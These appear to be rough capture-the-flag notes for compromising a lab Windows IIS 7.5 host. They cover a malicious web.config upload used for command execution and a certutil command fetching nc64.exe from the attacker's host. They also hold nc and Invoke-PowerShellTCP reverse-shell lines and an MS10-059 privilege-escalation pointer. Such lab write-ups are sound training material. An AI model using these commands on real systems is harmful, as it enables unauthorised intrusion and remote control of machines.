PORT   STATE SERVICE    VERSION
53/tcp open  tcpwrapped
80/tcp open  tcpwrapped

http://10.10.10.93/transfer.aspx

//upload  https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config
webconfig as cmd page


http://10.10.10.93/uploadedfiles/web.config?cmd=whoami

Microsoft-IIS/7.5



The server's software:
10.10.10.93
Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          9/17/2025, 10:37:53 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,639 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,662 MB
Virtual Memory: In Use:    433 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93


certutil -urlcache -f http://10.10.16.5:8000/nc64.exe C:\Windows\Temp\nc64.exe

C:\Windows\Temp\nc64.exe 10.10.16.5 8821 -e cmd.exe
[~/Downloads]$ nc -nvlp 8821
Listening on 0.0.0.0 8821
Connection received on 10.10.10.93 49161
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
bounty\merlin

C:\Users\merlin\Desktop>dir /a:h
dir /a:h
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users\merlin\Desktop

05/30/2018  12:22 AM               282 desktop.ini
09/17/2025  10:41 AM                34 user.txt
               2 File(s)            316 bytes
               0 Dir(s)  11,868,442,624 bytes free

C:\Users\merlin\Desktop>type user.txt
type user.txt
e9abeb1603d15

ms10-059 https://github.com/egre55/windows-kernel-exploits/tree/master  Chimichurri to get the admin


Invoke-PowerShellTCP -Reverse -IPAddress 10.10.16.5 -Port 8821
